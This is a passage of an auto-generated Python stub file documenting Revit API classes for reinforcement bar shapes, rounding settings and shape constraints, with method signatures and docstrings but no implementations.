IDisposable): """ Provides access to element reinforcement roundings overrides. """ def Dispose(self): """ Dispose(self: ReinforcementRoundingManager, A_0: bool) """ pass def ReleaseUnmanagedResources(self, *args): #cannot find CLR method """ ReleaseUnmanagedResources(self: ReinforcementRoundingManager, disposing: bool) """ pass def __enter__(self, *args): #cannot find CLR method """ __enter__(self: IDisposable) -> object """ pass def __exit__(self, *args): #cannot find CLR method """ __exit__(self: IDisposable, exc_type: object, exc_value: object, exc_back: object) """ pass def __init__(self, *args): #cannot find CLR method """ x.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signature """ pass ApplicableReinforcementRoundingSource = property(lambda self: object(), lambda self, v: None, lambda self: None) # default """Identifies the source of the rounding settings for this element. Get: ApplicableReinforcementRoundingSource(self: RebarRoundingManager) -> ReinforcementRoundingSource """ ApplicableSegmentLengthRounding = property(lambda self: object(), lambda self, v: None, lambda self: None) # default """The applicable rounding for shared parameters used by rebar. Get: ApplicableSegmentLengthRounding(self: RebarRoundingManager) -> float """ ApplicableSegmentLengthRoundingMethod = property(lambda self: object(), lambda self, v: None, lambda self: None) # default """The applicable rounding method for shared parameters used by rebar. Get: ApplicableSegmentLengthRoundingMethod(self: RebarRoundingManager) -> RoundingMethod """ ApplicableTotalLengthRounding = property(lambda self: object(), lambda self, v: None, lambda self: None) # default """The applicable rounding for Bar Length and Total Bar Length parameters. Get: ApplicableTotalLengthRounding(self: RebarRoundingManager) -> float """ ApplicableTotalLengthRoundingMethod = property(lambda self: object(), lambda self, v: None, lambda self: None) # default """The applicable rounding method for Bar Length and Total Bar Length parameters. Get: ApplicableTotalLengthRoundingMethod(self: RebarRoundingManager) -> RoundingMethod """ SegmentLengthRounding = property(lambda self: object(), lambda self, v: None, lambda self: None) # default """The rounding for shared parameters used by rebar. Get: SegmentLengthRounding(self: RebarRoundingManager) -> float Set: SegmentLengthRounding(self: RebarRoundingManager) = value """ SegmentLengthRoundingMethod = property(lambda self: object(), lambda self, v: None, lambda self: None) # default """Identifies the segment length rounding method Get: SegmentLengthRoundingMethod(self: RebarRoundingManager) -> RoundingMethod Set: SegmentLengthRoundingMethod(self: RebarRoundingManager) = value """ TotalLengthRounding = property(lambda self: object(), lambda self, v: None, lambda self: None) # default """The rounding for Bar Length and Total Bar Length parameters. Get: TotalLengthRounding(self: RebarRoundingManager) -> float Set: TotalLengthRounding(self: RebarRoundingManager) = value """ TotalLengthRoundingMethod = property(lambda self: object(), lambda self, v: None, lambda self: None) # default """Identifies the total length rounding method Get: TotalLengthRoundingMethod(self: RebarRoundingManager) -> RoundingMethod Set: TotalLengthRoundingMethod(self: RebarRoundingManager) = value """ class RebarShape(ElementType, IDisposable): """ RebarShape specifies the shape type for a Rebar instance. """ @staticmethod def Create(doc, definition, multiplanarDefinition, style, attachmentType, startHookAngle, startHookOrientation, endHookAngle, endHookOrientation, higherEnd): """ Create(doc: Document, definition: RebarShapeDefinition, multiplanarDefinition: RebarShapeMultiplanarDefinition, style: RebarStyle, attachmentType: StirrupTieAttachmentType, startHookAngle: int, startHookOrientation: RebarHookOrientation, endHookAngle: int, endHookOrientation: RebarHookOrientation, higherEnd: int) -> RebarShape Create a new instance of a Rebar Shape, which defines the shape of a rebar. doc: A document to contain the RebarShape. definition: The definition of the rebar shape, as a set of curves in a plane driven by parameters. multiplanarDefinition: If not null, the created RebarShape will be a 3D shape. The shape is built out of the planar RebarShapeDefinition, with additional out-of-plane segments defined by the RebarShapeMultiplanarDefinition object. Not supported in conjunction with RebarShapeDefinitionByArc of type Spiral or LappedCircle. style: Whether the shape is to be used as a standard bar or a stirrup/tie. attachmentType: When the style is stirrup/tie, specify whether it will attach to the interior of cover (cover is measured to the stirrups), or to the exterior of cover (cover is measured to the standard bars). Ignored when the style is Standard. startHookAngle: The start hook angle, expressed as an integral number of degrees. If 0, the shape will have no start hook. Common values are 0, 90, 135, and 180. startHookOrientation: The orientation of the start hook. Ignored when startHookAngle is 0. endHookAngle: The end hook angle, expressed as an integral number of degrees. If 0, the shape will have no end hook. Common values are 0, 90, 135, and 180. endHookOrientation: The orientation of the end hook. Ignored when endHookAngle is 0. higherEnd: When the rebar crosses itself, one end will be "lifted" to avoid self-intersection. Specify which end should be lifted: 0 for start, 1 for end. Returns: A new RebarShape instance. """ pass def Dispose(self): """ Dispose(self: Element, A_0: bool) """ pass def GetAllowed(self, barType): """ GetAllowed(self: RebarShape, barType: RebarBarType) -> bool Check whether a bar type can be used with this RebarShape. Bar types are allowed by default. barType: A bar type in the same document as this shape. Returns: True if this shape may be combined with this barType. """ pass def getBoundingBox(self, *args): #cannot find CLR method """ getBoundingBox(self: Element, view: View) -> BoundingBoxXYZ """ pass def GetCurvesForBrowser(self): """ GetCurvesForBrowser(self: RebarShape) -> IList[Curve] Generate curves for the shape, as used in the shape browser. Returns: An array of curves representing the shape with its default parameters. """ pass def GetDefaultHookAngle(self, index): """ GetDefaultHookAngle(self: RebarShape, index: int) -> int Get the hook angle, expressed as an integral number of degrees (common values are 0, 90, 135, and 180). index: 0 for the starting hook, 1 for the ending hook. """ pass def GetDefaultHookOrientation(self, index): """ GetDefaultHookOrientation(self: RebarShape, index: int) -> RebarHookOrientation Get the hook orientation. index: 0 for the starting hook, 1 for the ending hook. """ pass def GetEndTreatmentTypeId(self, iEnd): """ GetEndTreatmentTypeId(self: RebarShape, iEnd: int) -> ElementId get the id of the end treatment for the designated shape end """ pass def GetMultiplanarDefinition(self): """ GetMultiplanarDefinition(self: RebarShape) -> RebarShapeMultiplanarDefinition The optional 3D structure of the shape. Returns: A copy of the multiplanar definition. Changes will not affect the RebarShape. """ pass def GetRebarShapeDefinition(self): """ GetRebarShapeDefinition(self: RebarShape) -> RebarShapeDefinition Return the definition of the RebarShape. Returns: A copy of the definition. Changes will not affect the RebarShape. """ pass def HasEndTreatment(self): """ HasEndTreatment(self: RebarShape) -> bool returns true if the shape has end treatment for at least one end. """ pass def IsSameShapeIgnoringHooks(self, otherShape): """ IsSameShapeIgnoringHooks(self: RebarShape, otherShape: RebarShape) -> bool Test whether two shapes have equivalent definitions by comparing the RebarShapeDefinition and MultiplanarDefinition properties. otherShape: Another shape to be compared to this one. Returns: True if the shape definitions match, false otherwise. """ pass def ReleaseUnmanagedResources(self, *args): #cannot find CLR method """ ReleaseUnmanagedResources(self: Element, disposing: bool) """ pass def SetAllowed(self, barType, allowed): """ SetAllowed(self: RebarShape, barType: RebarBarType, allowed: bool) Specify which bar types can be used with this RebarShape. Bar types are allowed by default. barType: A bar type in the same document as this shape. allowed: Whether this shape may be combined with barType. """ pass def setElementType(self, *args): #cannot find CLR method """ setElementType(self: Element, type: ElementType, incompatibleExceptionMessage: str) """ pass def SetEndTreatmentTypeId(self, treatmenetId, iEnd): """ SetEndTreatmentTypeId(self: RebarShape, treatmenetId: ElementId, iEnd: int) set the end treatment type id for the designated shape end """ pass def __enter__(self, *args): #cannot find CLR method """ __enter__(self: IDisposable) -> object """ pass def __exit__(self, *args): #cannot find CLR method """ __exit__(self: IDisposable, exc_type: object, exc_value: object, exc_back: object) """ pass def __init__(self, *args): #cannot find CLR method """ x.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signature """ pass HigherEnd = property(lambda self: object(), lambda self, v: None, lambda self: None) # default """Defines the higher end of rebar shape. Get: HigherEnd(self: RebarShape) -> int """ RebarStyle = property(lambda self: object(), lambda self, v: None, lambda self: None) # default """Whether the shape represents a standard bar or a stirrup. Get: RebarStyle(self: RebarShape) -> RebarStyle """ ShapeFamilyId = property(lambda self: object(), lambda self, v: None, lambda self: None) # default """Get and return the rebar shape family id. Get: ShapeFamilyId(self: RebarShape) -> ElementId """ SimpleArc = property(lambda self: object(), lambda self, v: None, lambda self: None) # default """Check whether this shape consists of a single arc, possibly with hooks. Get: SimpleArc(self: RebarShape) -> bool """ SimpleLine = property(lambda self: object(), lambda self, v: None, lambda self: None) # default """Check whether this shape consists of a single straight segment, possibly with hooks. Get: SimpleLine(self: RebarShape) -> bool """ StirrupTieAttachment = property(lambda self: object(), lambda self, v: None, lambda self: None) # default """The attachment type of stirrup ties and rebars. Get: StirrupTieAttachment(self: RebarShape) -> StirrupTieAttachmentType """ class RebarShapeArcReferenceType(Enum, IComparable, IFormattable, IConvertible): """ A Rebar Shape Definition constraint that is measured to a bend must take the bar diameter into account by specifying whether it measures to the exterior, centerline, or interior of the bend. enum RebarShapeArcReferenceType, values: Centerline (0), External (1), Internal (-1) """ def __eq__(self, *args): #cannot find CLR method """ x.__eq__(y) <==> x==yx.__eq__(y) <==> x==yx.__eq__(y) <==> x==y """ pass def __format__(self, *args): #cannot find CLR method """ __format__(formattable: IFormattable, format: str) -> str """ pass def __ge__(self, *args): #cannot find CLR method pass def __gt__(self, *args): #cannot find CLR method pass def __init__(self, *args): #cannot find CLR method """ x.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signature """ pass def __le__(self, *args): #cannot find CLR method pass def __lt__(self, *args): #cannot find CLR method pass def __ne__(self, *args): #cannot find CLR method pass def __reduce_ex__(self, *args): #cannot find CLR method pass def __str__(self, *args): #cannot find CLR method pass Centerline = None External = None Internal = None value__ = None class RebarShapeBendAngle(Enum, IComparable, IFormattable, IConvertible): """ A bend in a rebar shape has an angular range specified by one of these values. The angles refer to the angle swept out by one segment as it is bent relative to another. That is, an "Obtuse" bend results in two segments that meet at an angle that is less than 90 degrees when measured internally. Put another way, to create an equilateral triangle, you would need two "Obtuse" bends. enum RebarShapeBendAngle, values: Acute (1), Obtuse (3), Right (2) """ def __eq__(self, *args): #cannot find CLR method """ x.__eq__(y) <==> x==yx.__eq__(y) <==> x==yx.__eq__(y) <==> x==y """ pass def __format__(self, *args): #cannot find CLR method """ __format__(formattable: IFormattable, format: str) -> str """ pass def __ge__(self, *args): #cannot find CLR method pass def __gt__(self, *args): #cannot find CLR method pass def __init__(self, *args): #cannot find CLR method """ x.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signature """ pass def __le__(self, *args): #cannot find CLR method pass def __lt__(self, *args): #cannot find CLR method pass def __ne__(self, *args): #cannot find CLR method pass def __reduce_ex__(self, *args): #cannot find CLR method pass def __str__(self, *args): #cannot find CLR method pass Acute = None Obtuse = None Right = None value__ = None class RebarShapeConstraint(object, IDisposable): """ A dimension or other constraint that takes part in a RebarShapeDefinition. """ def Dispose(self): """ Dispose(self: RebarShapeConstraint) """ pass def GetParamId(self): """ GetParamId(self: RebarShapeConstraint) -> ElementId Return the Id of the parameter associated with this constraint. Returns: The Id of the parameter, or InvalidElementId if the constraint does not have one. """ pass def ReleaseUnmanagedResources(self, *args): #cannot find CLR method """ ReleaseUnmanagedResources(self: RebarShapeConstraint, disposing: bool) """ pass def __enter__(self, *args): #cannot find CLR method """ __enter__(self: IDisposable) -> object """ pass def __exit__(self, *args): #cannot find CLR method """ __exit__(self: IDisposable, exc_type: object, exc_value: object, exc_back: object) """ pass def __init__(self, *args): #cannot find CLR method """ x.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signature """ pass def __repr__(self, *args): #cannot find CLR method """ __repr__(self: object) -> str """ pass IsValidObject = property(lambda self: object(), lambda self, v: None, lambda self: None) # default """Specifies whether the .NET object represents a valid Revit entity. Get: IsValidObject(self: RebarShapeConstraint) -> bool """ class RebarShapeConstraint180DegreeBendArcLength(RebarShapeConstraint, IDisposable): """ A constraint which can be applied to a RebarShapeSegment, and causes the segment to be replaced with a 180-degree arc. The associated parameter drives the arc length. RebarShapeConstraint180DegreeBendArcLength(paramId: ElementId) """ def Dispose(self): """ Dispose(self: RebarShapeConstraint, A_0: bool) """ pass def ReleaseUnmanagedResources(self, *args): #cannot find CLR method """ ReleaseUnmanagedResources(self: RebarShapeConstraint, disposing: bool) """ pass def __enter__(self, *args): #cannot find CLR method """ __enter__(self: IDisposable) -> object """ pass def __exit__(self, *args): #cannot find CLR method """ __exit__(self: IDisposable, exc_type: object, exc_value: object, exc_back: object) """ pass def __init__(self, *args): #cannot find CLR method """ x.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signature """ pass @staticmethod # known case of __new__ def __new__(self, paramId): """ __new__(cls: type, paramId: ElementId) """ pass class RebarShapeConstraint180DegreeBendRadius(RebarShapeConstraint, IDisposable): """ A constraint which can be applied to a RebarShapeSegment, and causes the segment to be replaced with a 180-degree arc. The associated parameter drives the radius of the arc. RebarShapeConstraint180DegreeBendRadius(paramId: ElementId, refType: RebarShapeArcReferenceType) """ def Dispose(self): """ Dispose(self: RebarShapeConstraint, A_0: bool) """ pass def ReleaseUnmanagedResources(self, *args): #cannot find CLR method """ ReleaseUnmanagedResources(self: RebarShapeConstraint, disposing: bool) """ pass def __enter__(self, *args): #cannot find CLR method """ __enter__(self: IDisposable) -> object """ pass def __exit__(self, *args): #cannot find CLR method """ __exit__(self: IDisposable, exc_type: object, exc_value: object, exc_back: object) """ pass def __init__(self, *args): #cannot find CLR method """ x.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signature """ pass @staticmethod # known case of __new__ def __new__(self, paramId, refType): """ __new__(cls: type, paramId: ElementId, refType: RebarShapeArcReferenceType) """ pass ArcReferenceType = property(lambda self: object(), lambda self, v: None, lambda self: None) # default """A choice of rule for measuring the radius. Get: ArcReferenceType(self: RebarShapeConstraint180DegreeBendRadius) -> RebarShapeArcReferenceType """ class RebarShapeConstraint180DegreeDefaultBend(RebarShapeConstraint, IDisposable): """ A constraint which can be applied to a RebarShapeSegment, and causes the segment to be replaced with a 180-degree arc. The arc's radius is not specified by the shape; instead it is a "default bend radius," taken from the RebarBarType associated with the Rebar instance. RebarShapeConstraint180DegreeDefaultBend() """ def Dispose(self): """ Dispose(self: RebarShapeConstraint, A_0: bool) """ pass def ReleaseUnmanagedResources(self, *args): #cannot find CLR method """ ReleaseUnmanagedResources(self: RebarShapeConstraint, disposing: bool) """ pass def __enter__(self, *args): #cannot find CLR method """ __enter__(self: IDisposable) -> object """ pass def __exit__(self, *args): #cannot find CLR method """ __exit__(self: IDisposable, exc_type: object, exc_value: object, exc_back: object) """ pass def __init__(self, *args): #cannot find CLR method """ x.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signature """ pass class RebarShapeConstraintAngleFromFixedDir(RebarShapeConstraint, IDisposable): """ A constraint which can be applied to a RebarShapeSegment and drives the angle of the segment relative to a fixed direction in UV-space. RebarShapeConstraintAngleFromFixedDir(paramId: ElementId, sign: int, direction: UV) """ def Dispose(self): """ Dispose(self: RebarShapeConstraint, A_0: bool) """ pass def ReleaseUnmanagedResources(self, *args): #cannot find CLR method """ ReleaseUnmanagedResources(self: RebarShapeConstraint, disposing: bool) """ pass def __enter__(self, *args): #cannot find CLR method """ __enter__(self: IDisposable) -> object """ pass def __exit__(self, *args): #cannot find CLR method """ __exit__(self: IDisposable, exc_type: object, exc_value: object, exc_back: object) """ pass def __init__(self, *args): #cannot find CLR method """ x.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signature """ pass @staticmethod # known case of __new__ def __new__(self, paramId, sign, direction): """ __new__(cls: type, paramId: ElementId, sign: int, direction: UV) """ pass Direction = property(lambda self: object(), lambda self, v: None, lambda self: None) # default """A fixed direction in UV-space. The parameter will drive the segment's angle relative to this direction. Get: Direction(self: RebarShapeConstraintAngleFromFixedDir) -> UV Set: Direction(self: RebarShapeConstraintAngleFromFixedDir) = value """ Sign = property(lambda self: object(), lambda self, v: None, lambda self: None) # default """When the sign is 1, the Direction is rotated clockwise by the angle's value. When -1, the Direction is rotated counter-clockwise. Get: Sign(self: RebarShapeConstraintAngleFromFixedDir) -> int Set: Sign(self: RebarShapeConstraintAngleFromFixedDir) = value """ class RebarShapeConstraintArcLength(RebarShapeConstraint, IDisposable): """ An arc-length constraint associated with an arc in a RebarShapeDefinition. RebarShapeConstraintArcLength(paramId: ElementId) """ def Dispose(self): """ Dispose(self: RebarShapeConstraint, A_0: bool) """ pass def ReleaseUnmanagedResources(self, *args): #cannot find CLR method """ ReleaseUnmanagedResources(self: RebarShapeConstraint, disposing: bool) """ pass def __enter__(self, *args): #cannot find CLR method """ __enter__(self: IDisposable) -> object """ pass def __exit__(self, *args): #cannot find CLR method """ __exit__(self: IDisposable, exc_type: object, exc_value: object, exc_back: object) """ pass def __init__(self, *args): #cannot find CLR method """ x.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signature """ pass @staticmethod # known case of __new__ def __new__(self, paramId): """ __new__(cls: type, paramId: ElementId) """ pass class RebarShapeConstraintChordLength(RebarShapeConstraint, IDisposable): """ A constraint that can be applied to a RebarShapeDefinitionByArc and drives the straight distance between the arc endpoints. RebarShapeConstraintChordLength(paramId: ElementId) """ def Dispose(self): """ Dispose(self: RebarShapeConstraint, A_0: bool) """ pass def ReleaseUnmanagedResources(self, *args): #cannot find CLR method """ ReleaseUnmanagedResources(self: RebarShapeConstraint, disposing: bool) """ pass def __enter__(self, *args): #cannot find CLR method """ __enter__(self: IDisposable) -> object """ pass def __exit__(self, *args): #cannot find CLR method """ __exit__(self: IDisposable, exc_type: object, exc_value: object, exc_back: object) """ pass def __init__(self, *args): #cannot find CLR method """ x.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signature """ pass @staticmethod # known case of __new__ def __new__(self, paramId): """ __new__(cls: type, paramId: ElementId) """ pass class RebarShapeConstraintCircumference(RebarShapeConstraint, IDisposable): """ A circumference constraint associated with an arc in a RebarShapeDefinition. RebarShapeConstraintCircumference(paramId: ElementId, refType: RebarShapeArcReferenceType) """ def Dispose(self): """ Dispose(self: RebarShapeConstraint, A_0: bool) """ pass def ReleaseUnmanagedResources(self, *args): #cannot find CLR method """ ReleaseUnmanagedResources(self: RebarShapeConstraint, disposing: bool) """ pass def __enter__(self, *args): #cannot find CLR method """ __enter__(self: IDisposable) -> object """ pass def __exit__(self, *args): #cannot find CLR method """ __exit__(self: IDisposable, exc_type: object, exc_value: object, exc_back: object) """ pass def __init__(self, *args): #cannot find CLR method """ x.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signature """ pass @staticmethod # known case of __new__ def __new__(self, paramId, refType): """ __new__(cls: type, paramId: ElementId, refType: RebarShapeArcReferenceType) """ pass ArcReferenceType = property(lambda self: object(), lambda self, v: None, lambda self: None) # default """The choice of rule for measuring the diameter. Get: ArcReferenceType(self: RebarShapeConstraintCircumference) -> RebarShapeArcReferenceType """ class RebarShapeConstraintDiameter(RebarShapeConstraint, IDisposable): """ A diameter constraint associated with an arc in a RebarShapeDefinition. RebarShapeConstraintDiameter(paramId: ElementId, refType: RebarShapeArcReferenceType) """ def Dispose(self): """ Dispose(self: RebarShapeConstraint, A_0: bool) """ pass def ReleaseUnmanagedResources(self, *args): #cannot find CLR method """ ReleaseUnmanagedResources(self: RebarShapeConstraint, disposing: bool) """ pass def __enter__(self, *args): #cannot find CLR method """ __enter__(self: IDisposable) -> object """ pass def __exit__(self, *args): #cannot find CLR method """ __exit__(self: IDisposable, exc_type: object, exc_value: object, exc_back: object) """ pass def __init__(self, *args): #cannot find CLR method """ x.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signature """ pass @staticmethod # known case of __new__ def __new__(self, paramId, refType): """ __new__(cls: type, paramId: ElementId, refType: RebarShapeArcReferenceType) """ pass ArcReferenceType = property(lambda self: object(), lambda self, v: None, lambda self: None) # default """The choice of rule for measuring the diameter. Get: ArcReferenceType(self: RebarShapeConstraintDiameter) -> RebarShapeArcReferenceType """ class RebarShapeConstraintFixedSegmentDir(RebarShapeConstraint, IDisposable): """ A constraint that can be applied to a RebarShapeSegment and fixes the direction of the segment in UV-space. RebarShapeConstraintFixedSegmentDir(dir: UV) """ def Dispose(self): """ Dispose(self: RebarShapeConstraint, A_0: bool) """ pass def ReleaseUnmanagedResources(self, *args): #cannot find CLR method """ ReleaseUnmanagedResources(self: RebarShapeConstraint, disposing: bool) """ pass def __enter__(self, *args): #cannot find CLR method """ __enter__(self: IDisposable) -> object """ pass def __exit__(self, *args): #cannot find CLR method """ __exit__(self: IDisposable, exc_type: object, exc_value: object, exc_back: object) """ pass def __init__(self, *args): #cannot find CLR method """ x.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signature """ pass @staticmethod # known case of __new__ def __new__(self, dir): """ __new__(cls: type, dir: UV) """ pass Direction = property(lambda self: object(), lambda self, v: None, lambda self: None) # default """The direction of the RebarShapeSegment in UV-space. Get: Direction(self: RebarShapeConstraintFixedSegmentDir) -> UV Set: Direction(self: RebarShapeConstraintFixedSegmentDir) = value """ class RebarShapeConstraintProjectedSegmentLength(RebarShapeConstraint, IDisposable): """ A constraint that measures the length of a segment as measured by projecting onto a direction that is not parallel to the segment. RebarShapeConstraintProjectedSegmentLength(paramId: ElementId, direction: UV, tripleProductSign: int, refType0: RebarShapeSegmentEndReferenceType, refType1: RebarShapeSegmentEndReferenceType) """ def Dispose(self): """ Dispose(self: RebarShapeConstraint, A_0: bool) """ pass def GetSegmentEndReferenceType(self, index): """ GetSegmentEndReferenceType(self: RebarShapeConstraintProjectedSegmentLength, index: int) -> RebarShapeSegmentEndReferenceType Choice of two possibilities for the start and end references of the length constraint. index: Which reference on the constraint. Either 0 or 1. """ pass def ReleaseUnmanagedResources(self, *args): #cannot find CLR method """ ReleaseUnmanagedResources(self: RebarShapeConstraint, disposing: bool) """ pass def __enter__(self, *args): #cannot find CLR method """ __enter__(self: IDisposable) -> object """ pass def __exit__(self, *args): #cannot find CLR method """ __exit__(self: IDisposable, exc_type: object, exc_value: object, exc_back: object) """ pass def __init__(self, *args): #cannot find CLR method """ x.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signature """ pass @staticmethod # known case of __new__ def __new__(self, paramId, direction, tripleProductSign, refType0, refType1): """ __new__(cls: type, paramId: ElementId, direction: UV, tripleProductSign: int, refType0: RebarShapeSegmentEndReferenceType, refType1: RebarShapeSegmentEndReferenceType) """ pass Direction = property(lambda self: object(), lambda self, v: None, lambda self: None) # default """A vector specifying the direction of the constraint. The direction is fixed, and the shape is always constructed so that the segment direction has a positive dot product with this vector. Get: Direction(self: RebarShapeConstraintProjectedSegmentLength) -> UV """ TripleProductSign = property(lambda self: object(), lambda self, v: None, lambda self: None) # default """Sign of the z-coordinate of the cross product of the Direction property with the segment vector. TripleProductSign is 1 if the segment direction is to be on the left of the constraint direction, or -1 if the segment direction is to be on the right. Get: TripleProductSign(self: RebarShapeConstraintProjectedSegmentLength) -> int """ class RebarShapeConstraintRadius(RebarShapeConstraint, IDisposable): """ A radius constraint associated with an arc in a RebarShapeDefinition. RebarShapeConstraintRadius(paramId: ElementId, refType: RebarShapeArcReferenceType) """ def Dispose(self): """ Dispose(self: RebarShapeConstraint, A_0: bool) """ pass def ReleaseUnmanagedResources(self, *args): #cannot find CLR method """ ReleaseUnmanagedResources(self: RebarShapeConstraint, disposing: bool) """ pass def __enter__(self, *args): #cannot find CLR method """ __enter__(self: IDisposable) -> object """ pass def __exit__(self, *args): #cannot find CLR method """ __exit__(self: IDisposable, exc_type: object, exc_value: object, exc_back: object) """ pass def __init__(self, *args): #cannot find CLR method """ x.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signature """ pass @staticmethod # known case of __new__ def __new__(self, paramId, refType): """ __new__(cls: type, paramId: ElementId, refType: RebarShapeArcReferenceType) """ pass ArcReferenceType = property(lambda self: object(), lambda self, v: None, lambda self: None) # default """The choice of rule for measuring the radius. Get: ArcReferenceType(self: RebarShapeConstraintRadius) -> RebarShapeArcReferenceType """ class RebarShapeConstraintSagittaLength(RebarShapeConstraint, IDisposable): """ A constraint that can be applied to a RebarShapeDefinitionByArc and drives the height of the arc. RebarShapeConstraintSagittaLength(paramId: ElementId) """ def Dispose(self): """ Dispose(self: RebarShapeConstraint, A_0: bool) """ pass def ReleaseUnmanagedResources(self, *args): #cannot find CLR method """ ReleaseUnmanagedResources(self: RebarShapeConstraint, disposing: bool) """ pass def __enter__(self, *args): #cannot find CLR method """ __enter__(self: IDisposable) -> object """ pass def __exit__(self, *args): #cannot find CLR method """ __exit__(self: IDisposable, exc_type: object, exc_value: object, exc_back: object) """ pass def __init__(self, *args): #cannot find CLR method """ x.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signature """ pass @staticmethod # known case of __new__ def __new__(self, paramId): """ __new__(cls: type, paramId: ElementId) """ pass class RebarShapeConstraintSegmentLength(RebarShapeConstraint, IDisposable): """ A constraint that controls the length of a segment. RebarShapeConstraintSegmentLength(paramId: ElementId, refType0: RebarShapeSegmentEndReferenceType, refType1: RebarShapeSegmentEndReferenceType) """ def Dispose(self): """ Dispose(self: RebarShapeConstraint, A_0: bool) """ pass def GetSegmentEndReferenceType(self, index): """ GetSegmentEndReferenceType(self: RebarShapeConstraintSegmentLength, index: int) -> RebarShapeSegmentEndReferenceType Choice of two possibilities for the start and end references of the length constraint. index: Which reference on the constraint. Either 0 or 1. """ pass def ReleaseUnmanagedResources(self, *args): #cannot find CLR method """ ReleaseUnmanagedResources(self: RebarShapeConstraint, disposing: bool) """ pass def __enter__(self, *args): #cannot find CLR method """ __enter__(self: IDisposable) -> object """ pass def __exit__(self, *args): #cannot find CLR method """ __exit__(self: IDisposable, exc_type: object, exc_value: object, exc_back: object) """ pass def __init__(self, *args): #cannot find CLR method """ x.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signature """ pass @staticmethod # known case of __new__ def __new__(self, paramId, refType0, refType1): """ __new__(cls: type, paramId: ElementId, refType0: RebarShapeSegmentEndReferenceType, refType1: RebarShapeSegmentEndReferenceType) """ pass class RebarShapeDefinition(object, IDisposable): """ A class to assist in defining rebar shapes. A RebarShape element needs exactly one RebarShapeDefinition. """ def AddFormulaParameter(self, paramId, formula): """ AddFormulaParameter(self: RebarShapeDefinition, paramId: ElementId, formula: str) Add a formula-driven parameter to the shape definition. paramId: The parameter. To obtain the id of a shared parameter, call RebarShapeParameters.GetElementIdForExternalDefinition. formula: The formula expressed as a string. The string is exactly what a user would type into the Family Types dialog, e.g. "Total Length*3.14159*(Bar Diameter/2)*(Bar Diameter/2)" """ pass def AddParameter(self, paramId, defaultValue): """ AddParameter(self: RebarShapeDefinition, paramId: ElementId, defaultValue: float) Add a parameter to the shape definition. paramId: The parameter. To obtain the id of a shared parameter, call RebarShapeParameters.GetElementIdForExternalDefinition. defaultValue: A default value for this parameter in shapes. The default values should be chosen carefully, because they are required to be consistent as a set of constraints. """ pass def CheckDefaultParameterValues(self, bendRadius, barDiameter): """ CheckDefaultParameterValues(self: RebarShapeDefinition, bendRadius: float, barDiameter: float) -> bool Check that the shape can be solved with the default parameter values. bendRadius: A value for the Bend Radius parameter. Zero is allowed. barDiameter: A value for the Bar Diameter parameter. Zero is allowed. Returns: True if the rebar can be solved with the default parameter values and the given bend radius and bar diameter; false if it cannot. """ pass def Dispose(self): """ Dispose(self: RebarShapeDefinition) """ pass def GetParameterDefaultValue(self, paramId): """ GetParameterDefaultValue(self: RebarShapeDefinition, paramId: ElementId) -> float Return the parameter's default value as stored in the definition. paramId: Id of a parameter in the definition. Returns: The parameter value. """ pass def GetParameterFormula(self, paramId): """ GetParameterFormula(self: RebarShapeDefinition, paramId: ElementId) -> str Return the parameter's formula, if one is associated with it. paramId: Id of a parameter in the definition. Returns: The formula, or an empty string if there is no formula for the parameter. """ pass def GetParameters(self): """ GetParameters(self: RebarShapeDefinition) -> IList[ElementId] Return the Ids of the shared parameters in the Definition. Returns: List of parameters as ElementIds. """ pass def HasParameter(self, paramId): """ HasParameter(self: RebarShapeDefinition, paramId: ElementId) -> bool Whether the definition stores the parameter. paramId: Id of a parameter. Returns: True if the definition stores the parameter, false otherwise. """ pass def ReleaseUnmanagedResources(self, *args): #cannot find CLR method """ ReleaseUnmanagedResources(self: RebarShapeDefinition, disposing: bool) """ pass def RemoveParameter(self, paramId): """ RemoveParameter(self: RebarShapeDefinition, paramId: ElementId) Remove the 